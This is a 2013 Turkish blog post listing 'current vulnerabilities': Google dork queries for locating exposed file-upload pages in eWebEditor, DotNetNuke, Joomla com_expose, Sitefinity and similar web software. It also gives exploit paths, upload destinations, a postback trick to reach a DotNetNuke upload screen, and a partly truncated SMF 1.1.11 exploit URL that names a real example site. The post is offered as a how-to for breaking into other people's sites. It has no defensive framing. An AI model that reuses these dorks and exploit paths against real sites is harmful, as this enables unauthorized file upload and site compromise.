Prof. Dr. Web

Teknolojik Bilgiye Ulaşmanın En Teknolojik Yolu

20 Mart 2013 Çarşamba

Güncel Açıklar

Güncel Açıklar 
Güncel Açıklar


EN GÜNCEL AÇIKLAR
inurl:”/admin/saveannounce_upload.asp”
inurl:”admin/eWebEditor/Upload.asp”
inurl:”UploadFile/upload.asp”


Dotnuke uplaod açıgı ;
inurl:/tabid/36/language/en-US/Default.aspx
Upload Sayfasi
Için; /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Upload Kod : j__doPostBack(’ctlUR L$cmdUpload’,’’ ) bu kod tarayıcınızın adres bolumune adres cubuguna yanı yazıp enterlayınca upload ekrani gelir.
Mesela
inurl:tabid/1162/Default.aspx degişik şekillerde kod geliştirilebilir.


Editör açıgı
inurl:editor/assetmanager/ (arama kodu geliştirilebilir)
EXPLOİT : /Editor/assetmanager/assetmanager.asp



Joomla upload açıgı
inurl index.php?option=com_expose
Exploit: administrator/components/com_expose/uploadimg.php
Uploadin gittigi yer : /components/com_expose/expose/img/


Sitefinity: Login upload açıgı
inurl:”Sitefinity: Login”
exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx


SMF 1.1.11 açıgı
inurl:SMF 1.1.11
Exploit :
http://siteadi.com/index.php?action=...ode=0eb3d1f811

örnek site :
http://modxcms.com/forums/index.php?...word;u=1;code= 0eb3d1f811
Gönderen zaman: 0 yorum
Etiketler:
Paylaşmak Güzeldir
  • Share to Facebook
  • Share to Twitter
  • Share to Google+
  • Share to Stumble Upon
  • Share to Evernote
  • Share to Blogger
  • Share to Email
  • Share to Yahoo Messenger
  • More...

0 yorum

:) :-) :)) =)) :( :-( :(( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ :-$ (b) (f) x-) (k) (h) (c) cheer

 
© 2011 Prof. Dr. Web
Designed by BlogThietKe Cooperated with Duy Pham
Released under Creative Commons 3.0 CC BY-NC 3.0
Posts RSSComments RSS
Back to top